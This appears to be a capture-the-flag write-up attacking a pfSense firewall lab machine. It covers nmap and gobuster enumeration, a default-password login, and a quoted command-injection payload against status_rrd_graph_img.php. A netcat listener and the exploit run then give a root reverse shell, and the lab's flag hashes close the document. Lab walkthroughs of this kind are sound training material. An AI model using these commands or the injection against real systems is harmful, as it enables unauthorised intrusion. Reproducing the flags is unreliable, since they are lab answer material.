Nmap Results

# Nmap 7.93 scan initiated Wed Apr  5 16:32:12 2023 as: nmap -Pn -p- --min-rate 10000 -A -oN scan.txt 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.014s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_ssl-date: TLS randomness does not represent time
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_http-server-header: lighttpd/1.4.35
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), FreeBSD 8.X (85%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:freebsd:freebsd:8.1 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Comau C4G robot control unit (92%), FreeBSD 8.1 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   13.99 ms 10.10.14.1
2   14.08 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  5 16:32:47 2023 -- 1 IP address (1 host up) scanned in 36.66 seconds

Service Enumeration

TCP/80

Redirects to TCP/443.

TCP/443

The default credential on pfSense installations is admin:pfsense, which did not work for me in this case.

Googling lighttpd 1.4.35 pfsense brought up this Redmine issue.

Bug #5509: lighttpd regression causing config sync failures in some circumstances - pfSense - pfSense bugtracker

Redmine

pfSense bugtrackerChris Buechler

Fairly confident this is 2.2.4.

Gobuster Enumeration

gobuster dir -k -u https://10.10.10.60 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,txt -r -t 100 -o gobuster-443.txt

/index.html           (Status: 200) [Size: 329]
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/stats.php            (Status: 200) [Size: 6690]
/edit.php             (Status: 200) [Size: 6689]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/changelog.txt        (Status: 200) [Size: 271]
/exec.php             (Status: 200) [Size: 6689]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 200) [Size: 7492]
/wizard.php           (Status: 200) [Size: 6691]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 200) [Size: 6113]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/system-users.txt     (Status: 200) [Size: 106]
/services_dyndns.php  (Status: 200) [Size: 6700]

Looks like we found a username, Rohit. Unfortunately, the changelog doesn't disclose a version number, but does confirm the existence of an unpatched vulnerability. I'm not certain if company defaults references the firewall default, so we'll give it a shot:

1. Rohit:pfsense — Nope
2. rohit:pfsense — 🎉

Looks like we're in!

More Enumeration

I know my way pretty well around pfSense, since I've run it in VMs and on hardware. The web console has a command prompt built into it, but it looks like some of the menus have been disabled for our user.

Based on the version of pfSense on the target, this looks like an excellent candidate for command execution. Let's go through the exploit to understand it further.

searchsploit -m 43560
cat 43560.py

"/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"

Looks like the database parameter on the status_rrd_graph_img.php script does not sanitize or validate the database and can be injected with a payload that will be piped to sh on the underlying host.

Exploit

This version of exploit is very outdated and should be patched promptly to mitigate existing vulnerabilities. Beyond that, the exploit in question does require authentication, which could have been prevented if the user accounts were protected by non-default passwords.

sudo rlwrap nc -lnvp 443

python3 --rhost 10.10.10.60 --lhost 10.10.14.13 --lport 443 --username rohit --password pfsense

Privilege Escalation

This exploit is executed by a privileged service, yielding a reverse shell as root.

Flags

8721327cc232073b40d27d9c17e7348b

d08c32a5d4f8c8b10e76eb51a69f1a86